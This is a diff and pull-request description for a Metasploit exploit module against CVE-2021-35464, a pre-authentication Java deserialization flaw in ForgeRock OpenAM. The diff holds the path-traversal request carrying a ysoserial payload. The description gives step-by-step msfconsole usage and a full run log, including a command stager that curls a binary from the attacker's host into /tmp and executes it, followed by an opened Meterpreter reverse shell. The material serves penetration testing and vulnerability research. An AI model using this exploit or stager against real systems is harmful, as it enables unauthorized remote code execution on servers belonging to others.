           'Author' => [
-            'Michael Stepankin', # Original Discovery
+            'Michael Stepankin',  # Original Discovery and PoC
             'bwatters-r7',        # Msf module
             'Spencer McIntyre',   # All of the Help
             'jheysel-r7'          # Check Method
@@ -30,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'DisclosureDate' => '2021-06-29',
           'License' => MSF_LICENSE,
           'Platform' => ['unix', 'linux'],
-          'Arch' => [ARCH_X86, ARCH_X64],
+          'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
           'Privileged' => false,
           'Targets' => [
             [
@@ -57,9 +64,6 @@ class MetasploitModule < Msf::Exploit::Remote
             ]
           ],
           'DefaultTarget' => 1,
-          'DefaultOptions' => {
-            'SSL' => false
-          },
           'Notes' => {
             'Stability' => [CRASH_SAFE],
             'Reliability' => [REPEATABLE_SESSION],
@@ -68,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
         )
     )
     register_options([
-      Opt::RPORT(7080),
+      Opt::RPORT(8080),
       OptString.new('TARGETURI', [true, 'Base path', '/'])
     ])
   end
@@ -77,11 +81,11 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/openam/oauth2/..;/ccversion/Version'),
-      'vars_get' => {
-        'jato.pageSession' => Base64.urlsafe_encode64(Rex::Text.rand_text_alphanumeric(6..13))
+      'vars_post' => {
+        'jato.pageSession' => Base64.urlsafe_encode64(rand_text_alphanumeric(6..13))
       }
     )
-    if res && res.code == 302 && res.headers['LOCATION'].include?('base/AMInvalidURL')
+    if res && res.code == 302 && res.headers['Location']&.end_with?('/base/AMInvalidURL')
       CheckCode::Appears
     else
       CheckCode::Safe
@@ -94,7 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/openam/oauth2/..;/ccversion/Version'),
-      'vars_get' => {
+      'vars_post' => {
         'jato.pageSession' => Base64.urlsafe_encode64("\x00" + ysoserial_payload)
       }
     )


### PR DESCRIPTION
This module leverages a pre-authentication remote code execution vulnerability
in ForgeRock’s AM identity and access management solution. The vulnerability
arises from a Java deserialization flaw in AM’s implementation of the JATO
framework and can be triggered by a simple one-line GET or POST request to a
vulnerable endpoint. Successful exploitation yields code execution on the
target system.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/multi/http/cve_2021_35464_forgerock_openam`
- [x] `set RHOST <ip>`
- [x] `set LHOST <ip>`
- [x] `set LPORT <port>`
- [x] `run`
- [x] **Verify** you get a session
- [x] **Verify** the thing does not explode

```
msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > show options

Module options (exploit/multi/http/cve_2021_35464_forgerock_openam):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.134.134  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      7080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local mac
                                         hine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.135.197  yes       The listen address (an interface may be specified)
   LPORT  8443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > run

[*] Started reverse TCP handler on 192.168.135.197:8443 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/Zrrhm8JKIL8QB2Q
[*] Local IP: http://192.168.135.197:8080/Zrrhm8JKIL8QB2Q
[*] Generated command stager: ["curl -so /tmp/wMKsYYMP http://192.168.135.197:8080/Zrrhm8JKIL8QB2Q;chmod +x /tmp/wMKsYYMP;/tmp/wMKsYYMP;rm -f /tmp/wMKsYYMP"]
[+] Successfully executed command: curl -so /tmp/wMKsYYMP http://192.168.135.197:8080/Zrrhm8JKIL8QB2Q;chmod +x /tmp/wMKsYYMP;/tmp/wMKsYYMP;rm -f /tmp/wMKsYYMP
[*] Client 192.168.134.134 (curl/7.64.0) requested /Zrrhm8JKIL8QB2Q
[*] Sending payload to 192.168.134.134 (curl/7.64.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 192.168.134.134
[*] Command Stager progress - 100.00% done (123/123 bytes)
[*] Meterpreter session 11 opened (192.168.135.197:8443 -> 192.168.134.134:44944) at 2021-07-02 15:59:30 -0500
[*] Server stopped.

meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Debian 10.9 (Linux 5.8.0-53-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: openam @ localhost (uid=1001, gid=0, euid=1001, egid=0)
meterpreter > 
```
